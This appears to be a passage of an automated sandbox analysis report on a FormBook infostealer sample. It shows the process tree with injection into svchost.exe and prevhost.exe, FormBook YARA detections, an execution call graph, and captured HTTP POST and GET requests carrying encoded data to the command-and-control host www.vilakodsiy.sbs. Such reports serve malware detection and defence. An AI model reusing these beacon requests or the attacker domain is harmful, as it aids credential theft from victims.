                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.549987104.21.64.1802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:05:09.163453102 CET817OUTPOST /w7eo/ HTTP/1.1
                                              Host: www.vilakodsiy.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.vilakodsiy.sbs
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 204
                                              Referer: http://www.vilakodsiy.sbs/w7eo/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 78 35 4c 50 6c 37 68 77 65 38 48 5a 66 69 61 72 50 33 69 74 30 4e 49 36 6e 54 4b 37 31 4f 76 31 65 73 52 61 66 38 50 32 2b 35 6c 6e 37 71 45 38 41 4c 67 63 6e 72 78 77 30 72 34 63 35 37 35 47 54 38 73 48 4a 38 7a 39 71 49 4f 77 44 47 30 56 36 53 71 66 70 75 64 79 34 68 30 73 54 73 41 62 67 4d 58 52 53 53 79 4f 66 66 45 49 71 78 77 6f 74 5a 5a 33 4c 38 55 50 70 4f 5a 66 78 49 71 64 33 2b 59 76 56 70 42 2f 6d 44 78 32 78 70 4d 6a 4f 55 53 41 52 61 51 65 36 30 53 4e 4f 37 5a 36 70 55 6c 32 48 61 39 51 70 45 59 32 66 69 67 32 6f 63 6b 2f 2b 4a 58 52 6e 64 37 78 38 48 62 61 43 57 45 35 41 73 4d 3d
                                              Data Ascii: gjR=x5LPl7hwe8HZfiarP3it0NI6nTK71Ov1esRaf8P2+5ln7qE8ALgcnrxw0r4c575GT8sHJ8z9qIOwDG0V6Sqfpudy4h0sTsAbgMXRSSyOffEIqxwotZZ3L8UPpOZfxIqd3+YvVpB/mDx2xpMjOUSARaQe60SNO7Z6pUl2Ha9QpEY2fig2ock/+JXRnd7x8HbaCWE5AsM=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.549988104.21.64.1802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:05:11.716317892 CET837OUTPOST /w7eo/ HTTP/1.1
                                              Host: www.vilakodsiy.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.vilakodsiy.sbs
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 224
                                              Referer: http://www.vilakodsiy.sbs/w7eo/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 78 35 4c 50 6c 37 68 77 65 38 48 5a 5a 43 4b 72 41 77 4f 74 38 4e 49 39 6a 6a 4b 37 2b 75 76 78 65 73 64 61 66 34 33 6d 39 50 56 6e 36 4f 49 38 42 4a 49 63 75 37 78 77 37 4c 35 57 39 37 35 50 54 38 6f 31 4a 2b 6e 39 71 49 71 77 44 48 45 56 36 6a 71 63 6f 2b 64 30 6a 52 30 75 58 73 41 62 67 4d 58 52 53 53 6e 54 66 66 4d 49 71 42 41 6f 75 38 74 30 43 63 55 4f 2b 2b 5a 66 31 49 71 6e 33 2b 5a 41 56 74 59 71 6d 42 5a 32 78 72 55 6a 50 42 2b 44 66 71 51 63 30 55 53 65 4b 4b 68 32 6f 79 6c 6c 61 4a 59 44 34 6e 67 49 65 55 52 63 79 2b 73 58 74 70 37 70 33 4f 7a 47 74 33 36 7a 59 31 55 4a 65 37 62 69 37 46 4b 48 48 42 43 53 4b 6e 72 4b 32 4c 59 33 46 69 41 44
                                              Data Ascii: gjR=x5LPl7hwe8HZZCKrAwOt8NI9jjK7+uvxesdaf43m9PVn6OI8BJIcu7xw7L5W975PT8o1J+n9qIqwDHEV6jqco+d0jR0uXsAbgMXRSSnTffMIqBAou8t0CcUO++Zf1Iqn3+ZAVtYqmBZ2xrUjPB+DfqQc0USeKKh2oyllaJYD4ngIeURcy+sXtp7p3OzGt36zY1UJe7bi7FKHHBCSKnrK2LY3FiAD


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.549989104.21.64.1802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:05:14.286490917 CET1854OUTPOST /w7eo/ HTTP/1.1
                                              Host: www.vilakodsiy.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.vilakodsiy.sbs
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 1240
                                              Referer: http://www.vilakodsiy.sbs/w7eo/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 78 35 4c 50 6c 37 68 77 65 38 48 5a 5a 43 4b 72 41 77 4f 74 38 4e 49 39 6a 6a 4b 37 2b 75 76 78 65 73 64 61 66 34 33 6d 39 50 64 6e 37 37 55 38 4f 49 49 63 30 37 78 77 32 72 35 56 39 37 34 66 54 38 52 38 4a 2b 72 79 71 4f 75 77 46 68 34 56 34 52 53 63 6e 2b 64 30 72 78 30 72 54 73 41 72 67 4d 48 56 53 53 33 54 66 66 4d 49 71 43 59 6f 35 35 5a 30 41 63 55 50 70 4f 5a 44 78 49 72 49 33 2f 78 36 56 74 55 36 6e 78 35 32 77 4c 45 6a 44 58 4b 44 5a 36 51 61 33 55 54 44 4b 4c 63 6f 6f 79 52 58 61 49 74 59 34 6e 59 49 63 53 4a 66 6e 64 55 4f 2f 59 71 46 34 75 4b 6b 77 51 4b 6f 53 48 41 47 62 70 6a 6d 33 42 6d 55 45 47 65 75 4f 56 79 43 67 63 51 67 45 46 56 6c 73 46 36 33 65 55 62 5a 6d 67 72 4e 7a 43 72 4d 35 65 4f 51 4a 5a 46 5a 38 69 63 56 34 58 6e 34 56 57 62 46 30 56 57 32 5a 67 2b 74 35 34 6b 52 43 78 64 38 45 6f 47 75 34 38 59 6b 70 48 35 30 44 7a 45 65 4b 76 46 73 75 53 4c 4c 4e 70 44 71 59 4b 69 36 6b 37 67 2f 79 6c 6a 74 63 2b 56 39 67 79 63 70 36 39 70 45 62 44 4e 50 65 57 39 65 6f 4c [TRUNCATED]
                                              Data Ascii: gjR=x5LPl7hwe8HZZCKrAwOt8NI9jjK7+uvxesdaf43m9Pdn77U8OIIc07xw2r5V974fT8R8J+ryqOuwFh4V4RScn+d0rx0rTsArgMHVSS3TffMIqCYo55Z0AcUPpOZDxIrI3/x6VtU6nx52wLEjDXKDZ6Qa3UTDKLcooyRXaItY4nYIcSJfndUO/YqF4uKkwQKoSHAGbpjm3BmUEGeuOVyCgcQgEFVlsF63eUbZmgrNzCrM5eOQJZFZ8icV4Xn4VWbF0VW2Zg+t54kRCxd8EoGu48YkpH50DzEeKvFsuSLLNpDqYKi6k7g/yljtc+V9gycp69pEbDNPeW9eoLoIEJ5jeeHe3bx7c0GIU495sIXGapMRGH0Y2J2eszMoj2YG+QFjDyoKQ5irZph8mk/8lBOyolHAPFmdFGuk+IRQo5fXl7ZsCVspYGPqYm2JLaFDYarxFpYRxmZ5xG+gDhypt1+qkJyvywOK12q47dj5Bkw/NdF+MkvqpVaGMI5qEHl/ugySbkOv6nXxnhwCNtDXPQ2AkEn6NAvkRydS0znaUXiwkBDOjKv0r4ZQnjZ7OXgB6AJ3fg+ddahxKYFe7fh+uikdO/bmGmWd6y7dS/0tH29XnNApw2cvLpX5oYe6toDOVSrgPhkkLj4+L+Ahc4NXZd9171U7cXCLUIeIEmjB7qYQR7nr3gf/J9dasmBeDy0JYuDYS1ziDuw1X/zEoPo+c3bN3HM2I1VXY/ukNeeeowbsjb8BS3ABG33Du4oZnfJJUE7TdGn1jFBQhaSBXB2NH7kpSpFgSXf0h7msPHzYhh3Bajlb9UnvKRkQeiKcdrIMGEXF2tM/taytpSiSX9wknaDpIxoBZLtIMr/zQlEPHq4Yi03/yaDnVpPDDloL3cHTtDBd1rnx7/C0fZTiDEal1J2vWSc1NyLr78dQxMRY4coMmoxLXtYP4r6BNaOlohwkgcLC2LdFPtIyBbX3gyf/6QWhppyff4qnrJR7hWxHSZdz21skbVgh [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.549990104.21.64.1802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:05:16.827178955 CET550OUTGET /w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVn HTTP/1.1
                                              Host: www.vilakodsiy.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:12:03:38
                                              Start date:10/01/2025
                                              Path:C:\Users\user\Desktop\4sfN3Gx1vO.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\4sfN3Gx1vO.exe"
                                              Imagebase:0x510000
                                              File size:1'245'696 bytes
                                              MD5 hash:F6F040A290CC9C41A1B07307F12310E5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:12:03:41
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\4sfN3Gx1vO.exe"
                                              Imagebase:0x40000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:12:04:05
                                              Start date:10/01/2025
                                              Path:C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe"
                                              Imagebase:0x700000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Target ID:5
                                              Start time:12:04:06
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\prevhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\prevhost.exe"
                                              Imagebase:0xe10000
                                              File size:24'064 bytes
                                              MD5 hash:79FED29A7F3DF4BA67599EFF3CDB4F1A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:6
                                              Start time:12:04:19
                                              Start date:10/01/2025
                                              Path:C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe"
                                              Imagebase:0x700000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:8
                                              Start time:12:04:31
                                              Start date:10/01/2025
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:3.3%
                                                Dynamic/Decrypted Code Coverage:1.3%
                                                Signature Coverage:4.9%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:55
                                                execution_graph 95890 51fe73 95897 52ceb1 95890->95897 95892 51fe89 95906 52cf92 95892->95906 95894 51feb3 95918 58359c 82 API calls __wsopen_s 95894->95918 95896 564ab8 95898 52ced2 95897->95898 95899 52cebf 95897->95899 95900 52ced7 95898->95900 95901 52cf05 95898->95901 95919 51aceb 23 API calls ISource 95899->95919 95920 52fddb 95900->95920 95930 51aceb 23 API calls ISource 95901->95930 95905 52cec9 95905->95892 95943 516270 95906->95943 95908 52cfc9 95911 52cffa 95908->95911 95948 519cb3 95908->95948 95911->95894 95915 56d184 95917 56d188 95915->95917 95964 51aceb 23 API calls ISource 95915->95964 95917->95917 95918->95896 95919->95905 95922 52fde0 95920->95922 95923 52fdfa 95922->95923 95926 52fdfc 95922->95926 95931 53ea0c 95922->95931 95938 534ead 7 API calls 2 library calls 95922->95938 95923->95905 95925 53066d 95940 5332a4 RaiseException 95925->95940 95926->95925 95939 5332a4 RaiseException 95926->95939 95929 53068a 95929->95905 95930->95905 95936 543820 pre_c_initialization 95931->95936 95932 54385e 95942 53f2d9 20 API calls __dosmaperr 95932->95942 95934 543849 RtlAllocateHeap 95935 54385c 95934->95935 95934->95936 95935->95922 95936->95932 95936->95934 95941 534ead 7 API calls 2 library calls 95936->95941 95938->95922 95939->95925 95940->95929 95941->95936 95942->95935 95965 52fe0b 95943->95965 95945 516295 95946 52fddb 22 API calls 95945->95946 95947 5162a3 95946->95947 95947->95908 95949 519cc2 _wcslen 95948->95949 95950 52fe0b 22 API calls 95949->95950 95951 519cea __fread_nolock 95950->95951 95952 52fddb 22 API calls 95951->95952 95953 519d00 95952->95953 95954 516350 95953->95954 95955 516362 95954->95955 95956 554a51 95954->95956 95978 516373 95955->95978 95988 514a88 22 API calls __fread_nolock 95956->95988 95959 51636e 95963 52d2f0 40 API calls 95959->95963 95960 554a5b 95961 554a67 95960->95961 95989 51a8c7 95960->95989 95963->95915 95964->95917 95967 52fddb 95965->95967 95966 53ea0c ___std_exception_copy 21 API calls 95966->95967 95967->95966 95968 52fdfa 95967->95968 95970 52fdfc 95967->95970 95975 534ead 7 API calls 2 library calls 95967->95975 95968->95945 95971 53066d 95970->95971 95976 5332a4 RaiseException 95970->95976 95977 5332a4 RaiseException 95971->95977 95974 53068a 95974->95945 95975->95967 95976->95971 95977->95974 95979 5163b6 __fread_nolock 95978->95979 95980 516382 95978->95980 95979->95959 95980->95979 95981 554a82 95980->95981 95982 5163a9 95980->95982 95984 52fddb 22 API calls 95981->95984 95993 51a587 95982->95993 95985 554a91 95984->95985 95986 52fe0b 22 API calls 95985->95986 95987 554ac5 __fread_nolock 95986->95987 95988->95960 95990 51a8db 95989->95990 95992 51a8ea __fread_nolock 95989->95992 95991 52fe0b 22 API calls 95990->95991 95990->95992 95991->95992 95992->95961 95994 51a59d 95993->95994 95997 51a598 __fread_nolock 95993->95997 95995 55f80f 95994->95995 95996 52fe0b 22 API calls 95994->95996 95996->95997 95997->95979 95998 511033 96003 514c91 95998->96003 96002 511042 96011 51a961 96003->96011 96008 514d9c 96009 511038 96008->96009 96019 5151f7 22 API calls __fread_nolock 96008->96019 96010 5300a3 29 API calls __onexit 96009->96010 96010->96002 96012 52fe0b 22 API calls 96011->96012 96013 51a976 96012->96013 96014 52fddb 22 API calls 96013->96014 96015 514cff 96014->96015 96016 513af0 96015->96016 96020 513b1c 96016->96020 96019->96008 96021 513b0f 96020->96021 96022 513b29 96020->96022 96021->96008 96022->96021 96023 513b30 RegOpenKeyExW 96022->96023 96023->96021 96024 513b4a RegQueryValueExW 96023->96024 96025 513b80 RegCloseKey 96024->96025 96026 513b6b 96024->96026 96025->96021 96026->96025 96027 563f75 96028 52ceb1 23 API calls 96027->96028 96029 563f8b 96028->96029 96037 564006 96029->96037 96096 52e300 23 API calls 96029->96096 96032 564052 96035 564a88 96032->96035 96098 58359c 82 API calls __wsopen_s 96032->96098 96034 563fe6 96034->96032 96097 581abf 22 API calls 96034->96097 96038 51bf40 96037->96038 96099 51adf0 96038->96099 96040 51bf9d 96041 5604b6 96040->96041 96042 51bfa9 96040->96042 96118 58359c 82 API calls __wsopen_s 96041->96118 96044 5604c6 96042->96044 96045 51c01e 96042->96045 96119 58359c 82 API calls __wsopen_s 96044->96119 96104 51ac91 96045->96104 96048 5604f5 96051 56055a 96048->96051 96120 52d217 256 API calls 96048->96120 96049 577120 22 API calls 96092 51c039 ISource __fread_nolock 96049->96092 96050 51c7da 96055 52fe0b 22 API calls 96050->96055 96080 51c603 96051->96080 96121 58359c 82 API calls __wsopen_s 96051->96121 96059 51c808 __fread_nolock 96055->96059 96063 52fe0b 22 API calls 96059->96063 96060 51ec40 256 API calls 96060->96092 96061 51af8a 22 API calls 96061->96092 96062 56091a 96155 583209 23 API calls 96062->96155 96093 51c350 ISource __fread_nolock 96063->96093 96066 5608a5 96129 51ec40 96066->96129 96068 5608cf 96068->96080 96153 51a81b 41 API calls 96068->96153 96070 560591 96122 58359c 82 API calls __wsopen_s 96070->96122 96073 5608f6 96154 58359c 82 API calls __wsopen_s 96073->96154 96076 51c237 96078 51c253 96076->96078 96079 51a8c7 22 API calls 96076->96079 96082 560976 96078->96082 96085 51c297 ISource 96078->96085 96079->96078 96080->96032 96081 52fddb 22 API calls 96081->96092 96156 51aceb 23 API calls ISource 96082->96156 96087 5609bf 96085->96087 96115 51aceb 23 API calls ISource 96085->96115 96087->96080 96157 58359c 82 API calls __wsopen_s 96087->96157 96088 51c335 96088->96087 96089 51c342 96088->96089 96116 51a704 22 API calls ISource 96089->96116 96090 51bbe0 40 API calls 96090->96092 96092->96048 96092->96049 96092->96050 96092->96051 96092->96059 96092->96060 96092->96061 96092->96062 96092->96066 96092->96070 96092->96073 96092->96076 96092->96080 96092->96081 96092->96087 96092->96090 96094 52fe0b 22 API calls 96092->96094 96108 51ad81 96092->96108 96123 577099 22 API calls __fread_nolock 96092->96123 96124 595745 54 API calls _wcslen 96092->96124 96125 52aa42 22 API calls ISource 96092->96125 96126 57f05c 40 API calls 96092->96126 96127 51a993 41 API calls 96092->96127 96128 51aceb 23 API calls ISource 96092->96128 96095 51c3ac 96093->96095 96117 52ce17 22 API calls ISource 96093->96117 96094->96092 96095->96032 96096->96034 96097->96037 96098->96035 96100 51ae01 96099->96100 96103 51ae1c ISource 96099->96103 96158 51aec9 96100->96158 96102 51ae09 CharUpperBuffW 96102->96103 96103->96040 96105 51acae 96104->96105 96106 51acd1 96105->96106 96164 58359c 82 API calls __wsopen_s 96105->96164 96106->96092 96109 51ad92 96108->96109 96110 55fadb 96108->96110 96111 52fddb 22 API calls 96109->96111 96112 51ad99 96111->96112 96165 51adcd 96112->96165 96115->96088 96116->96093 96117->96093 96118->96044 96119->96080 96120->96051 96121->96080 96122->96080 96123->96092 96124->96092 96125->96092 96126->96092 96127->96092 96128->96092 96147 51ec76 ISource 96129->96147 96130 51fef7 96137 51a8c7 22 API calls 96130->96137 96145 51ed9d ISource 96130->96145 96132 52fddb 22 API calls 96132->96147 96134 564600 96140 51a8c7 22 API calls 96134->96140 96134->96145 96135 564b0b 96175 58359c 82 API calls __wsopen_s 96135->96175 96136 51a8c7 22 API calls 96136->96147 96137->96145 96140->96145 96142 530242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96142->96147 96143 51fbe3 96143->96145 96146 564bdc 96143->96146 96152 51f3ae ISource 96143->96152 96144 51a961 22 API calls 96144->96147 96145->96068 96176 58359c 82 API calls __wsopen_s 96146->96176 96147->96130 96147->96132 96147->96134 96147->96135 96147->96136 96147->96142 96147->96143 96147->96144 96147->96145 96148 5300a3 29 API calls pre_c_initialization 96147->96148 96150 564beb 96147->96150 96151 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96147->96151 96147->96152 96172 5201e0 256 API calls 2 library calls 96147->96172 96173 5206a0 41 API calls ISource 96147->96173 96148->96147 96177 58359c 82 API calls __wsopen_s 96150->96177 96151->96147 96152->96145 96174 58359c 82 API calls __wsopen_s 96152->96174 96153->96073 96154->96080 96155->96076 96156->96087 96157->96080 96159 51aed9 __fread_nolock 96158->96159 96160 51aedc 96158->96160 96159->96102 96161 52fddb 22 API calls 96160->96161 96162 51aee7 96161->96162 96163 52fe0b 22 API calls 96162->96163 96163->96159 96164->96106 96169 51addd 96165->96169 96166 51adb6 96166->96092 96167 52fddb 22 API calls 96167->96169 96168 51a961 22 API calls 96168->96169 96169->96166 96169->96167 96169->96168 96170 51a8c7 22 API calls 96169->96170 96171 51adcd 22 API calls 96169->96171 96170->96169 96171->96169 96172->96147 96173->96147 96174->96145 96175->96145 96176->96150 96177->96145 96178 512e37 96179 51a961 22 API calls 96178->96179 96180 512e4d 96179->96180 96257 514ae3 96180->96257 96182 512e6b 96271 513a5a 96182->96271 96184 512e7f 96185 519cb3 22 API calls 96184->96185 96186 512e8c 96185->96186 96278 514ecb 96186->96278 96189 552cb0 96316 582cf9 96189->96316 96190 512ead 96193 51a8c7 22 API calls 96190->96193 96192 552cc3 96194 552ccf 96192->96194 96342 514f39 96192->96342 96195 512ec3 96193->96195 96198 514f39 68 API calls 96194->96198 96300 516f88 22 API calls 96195->96300 96200 552ce5 96198->96200 96199 512ecf 96201 519cb3 22 API calls 96199->96201 96348 513084 22 API calls 96200->96348 96202 512edc 96201->96202 96301 51a81b 41 API calls 96202->96301 96205 512eec 96207 519cb3 22 API calls 96205->96207 96206 552d02 96349 513084 22 API calls 96206->96349 96209 512f12 96207->96209 96302 51a81b 41 API calls 96209->96302 96211 552d1e 96212 513a5a 24 API calls 96211->96212 96214 552d44 96212->96214 96213 512f21 96217 51a961 22 API calls 96213->96217 96350 513084 22 API calls 96214->96350 96216 552d50 96218 51a8c7 22 API calls 96216->96218 96219 512f3f 96217->96219 96220 552d5e 96218->96220 96303 513084 22 API calls 96219->96303 96351 513084 22 API calls 96220->96351 96223 512f4b 96304 534a28 40 API calls 2 library calls 96223->96304 96224 552d6d 96228 51a8c7 22 API calls 96224->96228 96226 512f59 96226->96200 96227 512f63 96226->96227 96305 534a28 40 API calls 2 library calls 96227->96305 96230 552d83 96228->96230 96352 513084 22 API calls 96230->96352 96231 512f6e 96231->96206 96233 512f78 96231->96233 96306 534a28 40 API calls 2 library calls 96233->96306 96235 552d90 96236 512f83 96236->96211 96237 512f8d 96236->96237 96307 534a28 40 API calls 2 library calls 96237->96307 96239 512fdc 96239->96224 96241 512fe8 96239->96241 96240 512f98 96240->96239 96308 513084 22 API calls 96240->96308 96241->96235 96310 5163eb 22 API calls 96241->96310 96244 512fbf 96246 51a8c7 22 API calls 96244->96246 96245 512ff8 96311 516a50 22 API calls 96245->96311 96248 512fcd 96246->96248 96309 513084 22 API calls 96248->96309 96249 513006 96312 5170b0 23 API calls 96249->96312 96254 513021 96255 513065 96254->96255 96313 516f88 22 API calls 96254->96313 96314 5170b0 23 API calls 96254->96314 96315 513084 22 API calls 96254->96315 96258 514af0 __wsopen_s 96257->96258 96260 514b22 96258->96260 96356 516b57 96258->96356 96266 514b58 96260->96266 96353 514c6d 96260->96353 96262 514c29 96263 519cb3 22 API calls 96262->96263 96270 514c5e 96262->96270 96265 514c52 96263->96265 96264 519cb3 22 API calls 96264->96266 96267 51515f 22 API calls 96265->96267 96266->96262 96266->96264 96268 514c6d 22 API calls 96266->96268 96368 51515f 96266->96368 96267->96270 96268->96266 96270->96182 96379 551f50 96271->96379 96274 519cb3 22 API calls 96275 513a8d 96274->96275 96381 513aa2 96275->96381 96277 513a97 96277->96184 96401 514e90 LoadLibraryA 96278->96401 96283 514ef6 LoadLibraryExW 96409 514e59 LoadLibraryA 96283->96409 96284 553ccf 96285 514f39 68 API calls 96284->96285 96287 553cd6 96285->96287 96289 514e59 3 API calls 96287->96289 96292 553cde 96289->96292 96291 514f20 96291->96292 96293 514f2c 96291->96293 96431 5150f5 96292->96431 96294 514f39 68 API calls 96293->96294 96296 512ea5 96294->96296 96296->96189 96296->96190 96299 553d05 96300->96199 96301->96205 96302->96213 96303->96223 96304->96226 96305->96231 96306->96236 96307->96240 96308->96244 96309->96239 96310->96245 96311->96249 96312->96254 96313->96254 96314->96254 96315->96254 96317 582d15 96316->96317 96318 51511f 64 API calls 96317->96318 96319 582d29 96318->96319 96702 582e66 96319->96702 96322 5150f5 40 API calls 96323 582d56 96322->96323 96324 5150f5 40 API calls 96323->96324 96325 582d66 96324->96325 96326 5150f5 40 API calls 96325->96326 96327 582d81 96326->96327 96328 5150f5 40 API calls 96327->96328 96329 582d9c 96328->96329 96330 51511f 64 API calls 96329->96330 96331 582db3 96330->96331 96332 53ea0c ___std_exception_copy 21 API calls 96331->96332 96333 582dba 96332->96333 96334 53ea0c ___std_exception_copy 21 API calls 96333->96334 96335 582dc4 96334->96335 96336 5150f5 40 API calls 96335->96336 96337 582dd8 96336->96337 96338 5828fe 27 API calls 96337->96338 96340 582dee 96338->96340 96339 582d3f 96339->96192 96340->96339 96708 5822ce 96340->96708 96343 514f43 96342->96343 96344 514f4a 96342->96344 96345 53e678 67 API calls 96343->96345 96346 514f59 96344->96346 96347 514f6a FreeLibrary 96344->96347 96345->96344 96346->96194 96347->96346 96348->96206 96349->96211 96350->96216 96351->96224 